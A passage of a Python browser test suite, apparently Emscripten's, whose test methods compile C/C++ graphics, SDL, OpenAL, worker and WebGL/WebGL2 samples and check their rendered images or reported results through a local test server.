def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap_far(self): # indices do not start from 0
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_range.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda.png'), args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_firefox('fails on CI but works locally')
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda_quad.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda_quad.png'), args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_mt(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_mt.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_mt.png'), args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL']) # multitexture
@requires_graphics_hardware
def test_cubegeom_color2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_color2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_color2.png'), args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_texturematrix(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_texturematrix.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_texturematrix.png'), args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_fog(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_fog.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_fog.png'), args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_regal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'USE_REGAL=1', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2_vao(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre2_vao2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao2.png'), args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_es(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao_es.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'FULL_ES2=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_u4fv_2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_u4fv_2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_u4fv_2.png'), args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_glgettexenv(self):
self.btest('glgettexenv.c', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], expected=['1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png')
def test_sdl_set_clip_rect(self):
self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_create_rgb_surface_from(self):
self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png')
def test_sdl_rotozoom(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
create_test_file('pre.js', '''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
create_test_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_test_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_test_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js', '-lSDL', '-lGL'])
def test_sdl_ttf_render_text_solid(self):
self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-s', 'INITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'INITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1')
def test_sdl_free_screen(self):
self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png')
@requires_graphics_hardware
def test_glbegin_points(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_s3tc(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_s3tc_ffp_only(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-s', 'GL_FFP_ONLY=1', '-lGL', '-lSDL'])
@no_chrome('see #7117')
@requires_graphics_hardware
def test_aniso(self):
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
@requires_graphics_hardware
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_glerror(self):
self.btest('gl_error.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL'])
def test_openal_error(self):
for args in [
[],
['-lopenal', '-s', 'STRICT'],
['--closure', '1']
]:
print(args)
self.btest('openal_error.c', expected='1', args=args)
def test_openal_capture_sanity(self):
self.btest('openal_capture_sanity.c', expected='0')
def test_runtimelink(self):
create_test_file('header.h', r'''
struct point
{
int x, y;
};
''')
create_test_file('supp.cpp', r'''
#include <stdio.h>
#include "header.h"
extern void mainFunc(int x);
extern int mainInt;
void suppFunc(struct point &p) {
printf("supp: %d,%d\n", p.x, p.y);
mainFunc(p.x + p.y);
printf("supp see: %d\n", mainInt);
}
int suppInt = 76;
''')
main = r'''
#include <stdio.h>
#include "header.h"
extern void suppFunc(struct point &p);
extern int suppInt;
void mainFunc(int x) {
printf("main: %d\n", x);
}
int mainInt = 543;
int main( int argc, const char *argv[] ) {
struct point p = { 54, 2 };
suppFunc(p);
printf("main see: %d\nok.\n", suppInt);
#ifdef BROWSER
REPORT_RESULT(suppInt);
#endif
return 0;
}
'''
self.compile_btest(['supp.cpp', '-o', 'supp.wasm', '-s', 'SIDE_MODULE', '-O2', '-s', 'EXPORT_ALL'])
self.btest(main, args=['-DBROWSER=1', '-s', 'MAIN_MODULE', '-O2', '-s', 'RUNTIME_LINKED_LIBS=["supp.wasm"]', '-s', 'EXPORT_ALL=1'], expected='76')
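# supp.wasm is built as a SIDE_MODULE and linked at startup by the MAIN_MODULE build via
# RUNTIME_LINKED_LIBS, so mainFunc/suppFunc and mainInt/suppInt resolve across the module
# boundary and REPORT_RESULT(suppInt) yields the expected 76.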
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
create_test_file('pre.js', '''
Module.preRun = function() {
addRunDependency();
out('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
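# run() is held back until the addRunDependency() above is balanced by removeRunDependency(),
# so by the time main() executes, Module.okk has been set to 10, which is presumably the
# value pre_run_deps.cpp reads and reports.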
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
@no_wasm_backend('mem init file')
def test_mem_init(self):
create_test_file('pre.js', '''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
create_test_file('post.js', '''
var assert = function(check, text) {
if (!check) {
console.log('assert failed: ' + text);
maybeReportResultToServer(9);
}
}
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''')
# with assertions, we notice when memory was written to too early
self.btest('mem_init.cpp', expected='9', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1'])
# otherwise, we just overwrite
self.btest('mem_init.cpp', expected='3', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1', '-s', 'ASSERTIONS=0'])
@no_wasm_backend('mem init file')
def test_mem_init_request(self):
def test(what, status):
print(what, status)
create_test_file('pre.js', '''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?0');
setTimeout(xhr.onload = function() {
console.log('close!');
window.close();
}, 1000);
xhr.send();
throw 'halt';
}
console.log('WARNING: ' + x);
};
''' % self.port)
self.btest('mem_init_request.cpp', expected=status, args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--memory-init-file', '1'])
test('test.html.mem', '1')
test('nothing.nowhere', '0')
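# Supplying Module.memoryInitializerRequest lets the page start the .mem download itself and
# have startup consume that response instead of issuing its own XHR; the console.warn hook
# above converts the "bad request" failure path into the reported 0 for nothing.nowhere.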
def test_runtime_misuse(self):
post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
out('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
out('expected fail 1');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
out('expected fail 2');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
ok = true; // should fail and not reach here, runtime is not ready yet so any code execution will abort
} catch(e) {
out('expected fail 3');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
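# All three call paths (ccall, the cwrap wrapper, and a direct Module['_note'] call) are
# expected to abort while the runtime is not ready; expected_ok is flipped to true only in
# the variant below where the runtime is still alive when the calls are made.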
post_hook = r'''
function myJSCallback() {
// Run on the next event loop, as code may run in a postRun right after main().
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 0);
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
''' % self.port
create_test_file('pre_runtime.js', r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
for filename, extra_args, second_code in [
('runtime_misuse.cpp', [], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
]:
for mode in [[], ['-s', 'WASM=0']]:
print('\n', filename, extra_args, mode)
print('mem init, so async, call too early')
create_test_file('post.js', post_prep + post_test + post_hook)
self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-s', 'EXIT_RUNTIME=1'] + extra_args + mode, reporting=Reporting.NONE)
print('sync startup, call too late')
create_test_file('post.js', post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '-s', 'EXIT_RUNTIME=1'] + extra_args + mode, reporting=Reporting.NONE)
print('sync, runtime still alive, so all good')
create_test_file('post.js', post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected='606', args=['--post-js', 'post.js'] + extra_args + mode, reporting=Reporting.NONE)
def test_cwrap_early(self):
self.btest(os.path.join('browser', 'cwrap_early.cpp'), args=['-O2', '-s', 'ASSERTIONS=1', '--pre-js', path_from_root('tests', 'browser', 'cwrap_early.js'), '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["cwrap"]'], expected='0')
def test_worker_api(self):
self.compile_btest([path_from_root('tests', 'worker_api_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]'])
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
self.compile_btest([path_from_root('tests', 'worker_api_2_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-O2', '--minify', '0', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two", "_three", "_four"]', '--closure', '1'])
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify', '0'], expected='11')
def test_worker_api_3(self):
self.compile_btest([path_from_root('tests', 'worker_api_3_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]'])
self.btest('worker_api_3_main.cpp', expected='5')
def test_worker_api_sleep(self):
self.compile_btest([path_from_root('tests', 'worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]'] + self.get_async_args())
self.btest('worker_api_main.cpp', expected='566')
def test_emscripten_async_wget2(self):
self.btest('http.cpp', expected='0', args=['-I' + path_from_root('tests')])
# TODO: test only worked in non-fastcomp
@unittest.skip('non-fastcomp is deprecated and fails in 3.5')
def test_module(self):
self.compile_btest([path_from_root('tests', 'browser_module.cpp'), '-o', 'module.js', '-O2', '-s', 'SIDE_MODULE=1', '-s', 'DLOPEN_SUPPORT=1', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two"]'])
self.btest('browser_main.cpp', args=['-O2', '-s', 'MAIN_MODULE=1', '-s', 'DLOPEN_SUPPORT=1', '-s', 'EXPORT_ALL=1'], expected='8')
def test_preload_module(self):
create_test_file('library.c', r'''
#include <stdio.h>
int library_func() {
return 42;
}
''')
self.compile_btest(['library.c', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'library.wasm', '-s', 'EXPORT_ALL=1'])
os.rename('library.wasm', 'library.so')
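    # rename to .so so that --use-preload-plugins recognizes it as a shared library and pre-instantiates it (checked below via Module['preloadedWasm'])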
main = r'''
#include <dlfcn.h>
#include <stdio.h>
#include <emscripten.h>
int main() {
int found = EM_ASM_INT(
return Module['preloadedWasm']['/library.so'] !== undefined;
);
if (!found) {
REPORT_RESULT(1);
return 1;
}
void *lib_handle = dlopen("/library.so", RTLD_NOW);
if (!lib_handle) {
REPORT_RESULT(2);
return 2;
}
typedef int (*voidfunc)();
voidfunc x = (voidfunc)dlsym(lib_handle, "library_func");
if (!x || x() != 42) {
REPORT_RESULT(3);
return 3;
}
REPORT_RESULT(0);
return 0;
}
'''
self.btest(
main,
args=['-s', 'MAIN_MODULE=1', '--preload-file', '.@/', '-O2', '--use-preload-plugins', '-s', 'EXPORT_ALL=1'],
expected='0')
def test_mmap_file(self):
create_test_file('data.dat', 'data from the file ' + ('.' * 9000))
self.btest(path_from_root('tests', 'mmap_file.c'), expected='1', args=['--preload-file', 'data.dat'])
  # This does not actually verify anything except that --cpuprofiler and --memoryprofiler compile.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
@requires_graphics_hardware
def test_cpuprofiler_memoryprofiler(self):
self.btest('hello_world_gles.c', expected='0', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '-O2', '--cpuprofiler', '--memoryprofiler', '-lGL', '-lglut', '-DANIMATE'])
def test_uuid(self):
# Run with ./runner.py browser.test_uuid
# We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
# high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
# First run tests in Node and/or SPIDERMONKEY using self.run_js. Use closure compiler so we can check that
    # require('crypto').randomBytes and window.crypto.getRandomValues don't get minified out.
self.run_process([EMCC, '-O2', '--closure', '1', path_from_root('tests', 'uuid', 'test.c'), '-o', 'test.js', '-luuid'])
test_js_closure = open('test.js').read()
# Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
assert ").randomBytes" in test_js_closure
assert "window.crypto.getRandomValues" in test_js_closure
out = self.run_js('test.js')
print(out)
# Tidy up files that might have been created by this test.
try_delete(path_from_root('tests', 'uuid', 'test.js'))
try_delete(path_from_root('tests', 'uuid', 'test.js.map'))
# Now run test in browser
self.btest(path_from_root('tests', 'uuid', 'test.c'), '1', args=['-luuid'])
@requires_graphics_hardware
def test_glew(self):
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION=1'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-DGLEW_MX'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION=1', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
create_test_file('pre.js', r'''
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
addRunDependency('test_run_dependency');
removeRunDependency('test_run_dependency');
});
''')
self.btest('doublestart.c', args=['--pre-js', 'pre.js'], expected='1')
@parameterized({
'': ([],),
'closure': (['-O2', '-g1', '--closure', '1', '-s', 'HTML5_SUPPORT_DEFERRING_USER_SENSITIVE_REQUESTS=0'],),
'pthread': (['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'],),
'legacy': (['-s', 'MIN_FIREFOX_VERSION=0', '-s', 'MIN_SAFARI_VERSION=0', '-s', 'MIN_IE_VERSION=0', '-s', 'MIN_EDGE_VERSION=0', '-s', 'MIN_CHROME_VERSION=0'],)
})
@requires_threads
def test_html5_core(self, opts):
self.btest(path_from_root('tests', 'test_html5_core.c'), args=opts, expected='0')
@requires_threads
def test_html5_gamepad(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
print(opts)
self.btest(path_from_root('tests', 'test_gamepad.c'), args=[] + opts, expected='0')
@requires_graphics_hardware
def test_html5_webgl_create_context_no_antialias(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-DNO_ANTIALIAS', '-lGL'], expected='0')
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_threads
@requires_graphics_hardware
def test_html5_webgl_create_context(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1'], ['-s', 'USE_PTHREADS=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-lGL'], expected='0')
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
def test_html5_webgl_create_context2(self):
self.btest(path_from_root('tests', 'webgl_create_context2.cpp'), expected='0')
@requires_graphics_hardware
  # Test the HTML5 API special event targets (this only makes sense in the old
  # deprecated -s DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=0 mode)
def test_html5_special_event_targets(self):
self.btest(path_from_root('tests', 'browser', 'html5_special_event_targets.cpp'), args=['-lGL'], expected='0')
@requires_graphics_hardware
def test_html5_webgl_destroy_context(self):
for opts in [[], ['-O2', '-g1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_destroy_context.cpp'), args=opts + ['--shell-file', path_from_root('tests/webgl_destroy_context_shell.html'), '-lGL'], expected='0')
@no_chrome('see #7373')
@requires_graphics_hardware
def test_webgl_context_params(self):
if WINDOWS:
self.skipTest('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with')
self.btest(path_from_root('tests', 'webgl_color_buffer_readpixels.cpp'), args=['-lGL'], expected='0')
# Test for PR#5373 (https://github.com/emscripten-core/emscripten/pull/5373)
def test_webgl_shader_source_length(self):
for opts in [[], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_shader_source_length.cpp'), args=opts + ['-lGL'], expected='0')
def test_webgl2(self):
for opts in [
['-s', 'MIN_CHROME_VERSION=0'],
['-O2', '-g1', '--closure', '1', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1'],
['-s', 'FULL_ES2=1'],
]:
print(opts)
self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'] + opts, expected='0')
@requires_graphics_hardware
@requires_threads
def test_webgl2_pthreads(self):
# test that a program can be compiled with pthreads and render WebGL2 properly on the main thread
# (the testcase doesn't even use threads, but is compiled with thread support).
self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL', '-s', 'USE_PTHREADS=1'], expected='0')
def test_webgl2_objects(self):
self.btest(path_from_root('tests', 'webgl2_objects.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
def test_html5_webgl_api(self):
for mode in [['-s', 'OFFSCREENCANVAS_SUPPORT=1', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'],
['-s', 'OFFSCREEN_FRAMEBUFFER=1', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'],
[]]:
if 'OFFSCREENCANVAS_SUPPORT=1' in mode and os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'):
continue
self.btest(path_from_root('tests', 'html5_webgl.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'] + mode, expected='0')
def test_webgl2_ubos(self):
self.btest(path_from_root('tests', 'webgl2_ubos.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
@requires_graphics_hardware
def test_webgl2_garbage_free_entrypoints(self):
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1'], expected='1')
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), expected='1')
@requires_graphics_hardware
def test_webgl2_backwards_compatibility_emulation(self):
self.btest(path_from_root('tests', 'webgl2_backwards_compatibility_emulation.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-s', 'WEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1'], expected='0')
@requires_graphics_hardware
def test_webgl2_runtime_no_context(self):
    # tests that if we support WebGL1 and 2, and WebGL2RenderingContext exists,
    # but context creation fails, we can then manually try to create a
    # WebGL1 context and succeed.
self.btest(path_from_root('tests', 'test_webgl2_runtime_no_context.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2'], expected='1')
@requires_graphics_hardware
def test_webgl2_invalid_teximage2d_type(self):
self.btest(path_from_root('tests', 'webgl2_invalid_teximage2d_type.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2'], expected='0')
@requires_graphics_hardware
def test_webgl_with_closure(self):
self.btest(path_from_root('tests', 'webgl_with_closure.cpp'), args=['-O2', '-s', 'MAX_WEBGL_VERSION=2', '--closure', '1', '-lGL'], expected='0')
  # Tests that -s GL_ASSERTIONS=1 and glVertexAttribPointer with packed types work
@requires_graphics_hardware
def test_webgl2_packed_types(self):
self.btest(path_from_root('tests', 'webgl2_draw_packed_triangle.c'), args=['-lGL', '-s', 'MAX_WEBGL_VERSION=2', '-s', 'GL_ASSERTIONS=1'], expected='0')
@requires_graphics_hardware
def test_webgl2_pbo(self):
self.btest(path_from_root('tests', 'webgl2_pbo.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mipmap(self):
self.btest(path_from_root('tests', 'third_party', 'sokol', 'mipmap-emsc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL', '-O1'],
reference=os.path.join('third_party', 'sokol', 'mipmap-emsc.png'), reference_slack=2)
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mrt(self):
self.btest(path_from_root('tests', 'third_party', 'sokol', 'mrt-emcc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'],
reference=os.path.join('third_party', 'sokol', 'mrt-emcc.png'))
@requires_graphics_hardware
def test_webgl2_sokol_arraytex(self):
self.btest(path_from_root('tests', 'third_party', 'sokol', 'arraytex-emsc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'],
reference=os.path.join('third_party', 'sokol', 'arraytex-emsc.png'))
def test_sdl_touch(self):
